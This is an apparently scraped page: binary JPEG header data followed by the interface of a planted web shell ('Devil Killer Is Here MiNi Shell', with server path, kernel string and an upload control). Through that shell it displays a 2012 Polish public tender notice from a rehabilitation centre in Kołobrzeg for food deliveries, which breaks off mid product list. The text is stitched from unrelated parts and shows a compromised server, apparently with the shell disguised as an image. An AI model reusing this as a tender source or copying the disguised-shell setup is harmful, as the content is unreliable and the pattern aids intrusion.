JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20120927/368234-N-2012.html

<p class="kh_header"><b>Kołobrzeg: Okresowe dostawy artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 368234 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA , ul. C. K. Norwida 3, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3552010, faks 094 3552011.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niwa.info.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Okresowe dostawy artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Okresowe dostawy artykułów spożywczych w podziale na zadania i w terminach 1 roku od daty określonej poniżej:
1)	Zadanie nr 1 - warzywa i owoce konserwowe, przetworzone, sosy, zupy i buliony, zioła i przyprawy, mieszanki przypraw i mieszanki przypraw korzennych, owoce suszone - od 22.11.2012 r.
2)	Zadanie nr 2 - produkty przemiału ziarna, skrobi i produktów skrobiowych - od 8.11.2012 r.
3)	Zadanie nr 3 - herbata, kawa, słodycze - od 22.11.2012 r.
4)	Zadanie nr 4 - cukier i produkty pokrewne - od 08.11.2012 r.
5)	Zadanie nr 5 - mąka - od 25.10.2012 r.
6)	Zadanie nr 6 - olej - od 25.10.2012 r.
2.	Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 3 do SIWZ.
3.	Przedmiot zamówienia winien spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego żywności a w szczególności:
1)	ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz. U. z 2010 r. Nr 136 poz. 914 ze zm.),
2)	ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno - spożywczych. (Dz. U. z 2005 r. Nr 187, poz. 1577 ze zm.),
3)	Ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (Dz. U. z 2006 r., nr 17, poz. 127 ze zmianami) oraz aktami wykonawczymi wydanymi na podstawie tej ustawy,
4)	rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 r. w sprawie znakowania środków spożywczych ( Dz. U. Nr 137, poz. 966 ze zm.).
5)	rozporządzenia Nr 178/2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002 r. ustanawiające ogólne zasady i wymagania prawa żywnościowego, powołujące Europejski Urząd ds. bezpieczeństwa żywności oraz ustanawiające procedury w zakresie bezpieczeństwa żywności (Dz.Urz.WE nr L31/1 z dnia 01.02.2002 r.),
6)	rozporządzenia (WE) Nr 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r. w sprawie higieny środków spożywczych (Dz.Urz.UE L139/1 z dnia 30.04.2004 r.), 
7)	rozporządzenia (WE) Nr 853/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004r. ustanawiające szczególne przepisy dotyczące higieny w odniesieniu do żywności pochodzenia zwierzęcego (Dz.U. L 139 z 30.4.2004)
8)	rozporządzenia Komisji Nr 1441/2007 z dnia 5 grudnia 2007 r. zmieniającego rozporządzenie (WE) nr 2073/2005 w sprawie kryteriów mikrobiologicznych dotyczących środków spożywczych (Dz.Urz.UE L322/12 z dnia 7.12.2007 r.).
9)	rozporządzenia Komisji Nr 1881/2006 z dnia 19 grudnia 2006 r. ustalającego najwyższe dopuszczalne poziomy niektórych zanieczyszczeń w środkach spożywczych (Dz.Urz.UE L364/5 z dnia 20.12.2006 r.)
10)	rozporządzenia Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004r., 
w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz uchylające Dyrektywy 80/590/EWG i 89/109/EWG  (Dz.Urz.UE L384/4 z dnia 13.11.2004 r.),
3.	Dostawy przedmiotu zamówienia będą realizowane w asortymencie, ilościach i terminach wskazanych każdorazowo przez zamawiającego w zamówieniu - pod rygorem odmowy przyjęcia dostawy i dokonania zapłaty. 
4.	Ilości określone przez zamawiającego są ilościami orientacyjnymi, które mogą ulec zmianie z uwagi 
na różnice w obłożeniu obiektu, zmianę kategorii gości, zalecone diety oraz specyfikę sporządzania posiłków, w związku, z czym Zamawiający zastrzega sobie prawo do zmiany asortymentu dostaw w poszczególnych pozycjach załącznika nr 3 do umowy, po cenach w nim określonych.
5.	Biorąc pod uwagę zapis pkt 4 zapotrzebowanie określone w załączniku nr 3 do umowy nie jest wiążące 
dla Zamawiającego i jego niezrealizowanie nie będzie stanowić podstawy roszczeń odszkodowawczych Wykonawcy.
6.	CPV:  
1)	15.80.00.00-6  Różne produkty spożywcze,
2)	15.60.00.00-4  Produkty przemiału ziarna, skrobi i produktów skrobiowych,
3)	15.40.00.00-2  Oleje i tłuszcze zwierzęce lub roślinne,
4)	15.30.00.00-1  Owoce, warzywa i podobne produkty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.30.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w terminie do dnia  09.10.2012 r.  w wysokości: 
1)	Zadanie nr 1 - 2.000,00 PLN,
2)	Zadanie nr 2 - 600,00 PLN,
3)	Zadanie nr 3 - 1.500,00 PLN,
4)	Zadanie nr 4 - 350,00 PLN,
5)	Zadanie nr 5 - 200,00 PLN,
6)	Zadanie nr 6 - 800,00 PLN.
2.	Wadium można wnieść w jednej z następujących form: pieniądzu, poręczeniach bankowych 
lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. 
o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium w pieniądzu należy wpłacić przelewem na konto Zamawiającego:
BGŻ SA Oddział Kołobrzeg 73 2030 0045 1110 0000 0049 3200 z adnotacją wadium w postępowaniu na okresowe dostawy artykułów spożywczych. Dowodem wniesienia wadium może być potwierdzony odcinek wpłaty lub potwierdzony przez bank odcinek polecenia dokonania przelewu lub potwierdzony przez Wykonawcę inny dokument potwierdzający dokonanie wpłaty kwoty wadium załączony do oferty.  Wadium musi być wpłacone na tyle wcześnie, aby w terminie składania ofert kwota wadium znajdowała się 
na rachunku bankowym Zamawiającego.
4.	Dowodem wniesienia wadium może być potwierdzony odcinek wpłaty lub potwierdzony przez bank odcinek polecenia dokonania przelewu lub potwierdzony przez Wykonawcę inny dokument potwierdzający dokonanie wpłaty kwoty wadium załączony do oferty.  
5.	Wadium musi być wpłacone na tyle wcześnie, aby w terminie składania ofert kwota wadium znajdowała się na rachunku bankowym Zamawiającego.
6.	W przypadku wadium wnoszonego w innych formach niż pieniądz, należy oryginał dokumentu umieścić 
w odrębnej kopercie opatrzonej dopiskiem WADIUM i złożyć wraz z ofertą. 
7.	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy: 
1)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta/poręczyciela (instytucji udzielających gwarancji/poręczenia) oraz wskazanie ich siedzib, 
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem, 
3)	kwotę gwarancji/poręczenia, 
4)	termin ważności gwarancji/poręczenia, 
5)	zobowiązanie gwaranta/poręczyciela do: zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: 
a)	odmówił podpisania umowy na warunkach określonych we ofercie, lub 
b)	nie wniósł zabezpieczenia należytego wykonania umowy, lub 
c)	zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
6)	zobowiązanie gwaranta/poręczyciela do: zapłacenia kwoty gwarancji/poręczenia jeżeli wykonawca 
w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów 
lub oświadczeń o których mowa w art. 25 ust. 1 ustawy Pzp lub pełnomocnictw, chyba że udowodni,
 iż wynika to z przyczyn nie leżących po jego stronie. 
8.	Zwrot wadium nastąpi zgodnie z przepisem art. 46 ustawy Pzp. 
9.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Pzp, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących 
po stronie wykonawcy.
11.	Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- warunek zostanie uznany za spełniony jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert w postępowaniu, 
a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej 2 dostawy polegające na dostawach artykułów spożywczych o wartości nie mniejszej niż 60 tys. zł brutto każda, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że dostawy te zostały wykonane lub są wykonywane należycie. 
Wykonawca może polegać na wiedzy i doświadczeniu podmiotów trzecich, na zasadzie korzystania 
z zasobów udostępnionych na czas realizacji zamówienia, dołączając do oferty pisemne zobowiązanie tych podmiotów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony  jeżeli wykonawca wykaże, że posiada środki transportu, którymi będzie dostarczał przedmiot zamówienia, odpowiadające wymaganiom sanitarnym, określonym ustawą z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U.2010.136.914 ze zmianami) w związku z rozporządzeniem nr 852/2004 Parlamentu Europejskiego i Rady Unii Europejskiej z dn. 29 kwietnia 2004 r. (ogólne wymogi higieny dla wszystkich przedsiębiorstw sektora spożywczego - załącznik nr 2 do rozporządzenia).
Wykonawca może polegać potencjale technicznym podmiotów trzecich, na zasadzie korzystania 
z zasobów udostępnionych na czas realizacji zamówienia, dołączając do oferty pisemne zobowiązanie tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	zaświadczenie właściwego organu Państwowej Inspekcji Sanitarnej o sprawowaniu nadzoru nad stosowaniem zasad wdrożonego systemu HACCP (podstawa prawna art. 59 i 73 ustawy z dnia 
25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia Dz.U.2010.136.914 j.t.)
lub
2)	protokół z urzędowej kontroli żywności, przeprowadzonej przez organy Państwowej Inspekcji Sanitarnej zgodnie z art. 4 Rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej nr 882/2004 z dnia 29.04.2004r. Dz. U. UE L.04.139.l, w skład którego wchodzi punkt określający prawidłowości stosowania zasad systemu HACCP (podstawa prawna: art. 9 i 10 rozporządzenia jak wyżej oraz art. 59 i 73 ust. 1 i 6 ustawy z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia Dz.U.2010.136.914 j.t.)
lub
3)	certyfikat HACCP - nie dotyczy producentów na etapie produkcji pierwotnej.
Prawo Unii Europejskiej nie zobowiązuje przedsiębiorców do certyfikacji wdrożonego systemu HACCP. System certyfikacji przez niezależne instytucje certyfikujące jest w pełni dobrowolny. Zatem alternatywne sformułowanie wymagań Zamawiającego co do dokumentów potwierdzających wdrożenie i stosowanie HACCP jest w pełni uzasadnione.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień umowy w stosunku do treści oferty, 
na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
1)	wystąpienia okoliczności skutkujących koniecznością zmiany terminu realizacji zamówienia,
2)	wystąpienia zmiany przepisów prawa w zakresie realizacji przedmiotu zamówienia i konieczności dostosowania do nich zapisów umowy,
3)	w przypadku zmiany stawek podatku od towarów i usług (VAT), skutkujących koniecznością zmiany wynagrodzenia, 
4)	wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania SIWZ 
i podpisywania umowy, a które są niezbędne dla prawidłowej realizacji zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niwa.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2012 godzina 12:30, miejsce: Centrum Rehabilitacji Rolników Kasy Rolniczego Ubezpieczenia Społecznego NIWA w Kołobrzegu - 78-100 Kołobrzeg ul. C.K. Norwida 3, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zadanie 1- warzywa i owoce konserwowe, przetworzone, sosy, zupy i buliony, zioła i przyprawy, mieszanki przypraw i mieszanki przypraw korzennych, owoce suszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Nazwa produktu	Ilość 	JM
1	Ananas konserwowy w plastrach   skład  Ananas w syropie-Opakowanie od  0,3 do 0,4 )	100	szt
2	Aromaty do ciast mix-paluszki	100	szt
3	Bazylia-Opakowanie 10g	10	szt
4	Biały barszcz Knorr lub produkt równoważny (Mąka pszenna, tłuszcz roślinny, substancje wzmacniające smak i zapach ) Opakowania  1kg	60	szt
